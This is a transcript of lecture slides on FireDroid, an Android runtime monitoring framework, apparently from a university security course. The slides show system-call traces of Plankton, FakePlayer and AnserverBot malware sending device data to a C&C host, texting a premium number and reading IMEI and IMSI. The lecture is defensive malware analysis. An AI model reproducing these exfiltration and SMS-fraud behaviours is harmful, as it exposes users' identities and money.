1 / 16

Monitoring Malware at Runtime

Monitoring Malware at Runtime. From Last Lecture. Malware authors use advanced coding for avoiding detection AnserverBot is a very sophisticate piece of software AVS is lagging behind Low detection rate on new malware Large exposure window before updating DB

faraji
Download Presentation

Monitoring Malware at Runtime

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Monitoring Malware at Runtime

  2. From Last Lecture • Malware authors use advanced coding for avoiding detection • AnserverBotis a very sophisticate piece of software • AVS is lagging behind • Low detection rate on new malware • Large exposure window before updating DB • Main issue: rely only on app signature • What we need is a tool to detect runtime behaviour

  3. FireDroid • Our group is developing a new Android Security framework • FireDroidis capable of monitoring app execution and enforcing security policies • No need of modifying Android OS code! • Only modification is to insert a line of text in the init.rc file • FireDroidenables us to monitor system call execution of apps (and malware)

  4. System Call Interposition • System calls are used by apps to interact with the kernel • By intercepting sensitive system calls we can enforce security policies to better protect Android • We can use FireDroid also to provide us information about the system call executed by apps

  5. Malware Genome Project • Collection of 2GB of malware samples • We have executed some of these samples within FireDroid sandbox • In the following, we are going to see some more details • After the semester break, Daniel will provide a live demo

  6. Plankton • Communication with a C&C server • Sends some info when the installation is complete • Together with some setting of the phone

  7. Opening a socket [1743] syscall=socket(281) domain:PF INET6 type:SOCK STREAM protocol:IPPROTO IP ****************************** [1743] syscall=bind(282) socket: socket:[26088] sa family = AF INET6 port = 0 address = :: ****************************** [1743] syscall=connect(283) socket: socket:[26088] sa family = AF INET6 port = 80 address = 208.93.141.140 ******************************

  8. Establishing a connection [****************************** [1743] syscall=sendto(290) socket: socket:[26088] Connected Socket! data len: 168 data: POST /ProtocolGW/installation HTTP/1.1 Content-Length: 1426 Content-Type: application/x-www-form-urlencoded Host: www.searchwebmobile.com Connection: Keep-Alive ****************************** [1743] syscall=sendto(290) socket:socket:[26088] Connected Socket! data len: 1024 data: action=get&applicationId=325842969&developerId=752469853& deviceId=000000000000000&currentVersion=-1&permissions=android…..

  9. FakePlayer • The main activity is to send SMS • It will get the handler for the SMS service from the Service Manager • Then sends SMS to premium number (7132) with different subscription codes

  10. Sending SMS [*1905]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC _MGR _GET _SERVICE service name = isms data size = 80 ****************************** [*1905]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = com.android.internal.telephony.ISms target = 0x9 code = 5 (sendText) data size = 128 Destination: 7132 SMS Body: 849321

  11. AnserverBot • Retrieves information from the Telephony services • Telephone number • International Mobile Station Equipment Identity (IMEI) • International Mobile Subscriber Identity (IMSI) • This info is quite sensitive because it specifically points at YOU!

  12. Getting the PhoneSubInfoService [*2071]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = android.os.IServiceManager target = 0x0 code = SVC MGR GET SERVICE service name = iphonesubinfo ****************************** [*2071]ioctl on /dev/binder with BINDER WRITE READ cmd:BC TRANSACTION: target name = com.android.internal.telephony.IPhoneSubInfo target = 0xe code = 5 data size = 100 data in text format: code 5: getLineNumber: Retrieves the phone number string for line 1

  13. Getting More Info ****************************** … code 1: getDeviceId: Retrieves the unique device ID, e.g., IMEI for GSM phones. ****************************** … code 4: getIccSerialNumber: Retrieves the serial number of the ICC, if applicable. ****************************** … code 2: getDeviceSvn: Retrieves the software version number for the device, e.g., IMEI/SV for GSM phones. ****************************** … code 3: getSubscriberId: Retrieves the unique subscriber ID, e.g., IMSI for GSM phones.

  14. AnserverBot Fetching from Baidu ****************************** [1639] syscall=connect(283) socket: socket:[57270] sa family = AF INET6 port = 80 address = 220.181.111.147 ****************************** [1639] syscall=sendto(290) socket: socket:[57270] Connected Socket! data len: 153 data: GET / HTTP/1.1 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.0.4; sdk Build/MR1)^M Host: www.baidu.com Connection: Keep-Alive Accept-Encoding: gzip

  15. AnserverBot Fetching from Baidu [1639] syscall=recvfrom(292) socket: socket:[57270] Connected Socket! data len: 128 data: HTTP/1.1 200 OK^M Set-Cookie: BAIDUID=127C8FA29422CAB3BA61707A4969F5DB:FG=1; max-age=31536000; expires=Tue, 29-Oct-13 01:17:10 GM ****************************** [1639] syscall=recvfrom(292) :00:00 GMT; path=/; domain=.baidu.com^M P3P: CP='' OTI DSP COR IVA OUR IND COM ``^M Cache-Control: no-cache^M Content-type: text/html ******************************

  16. Questions?

More Related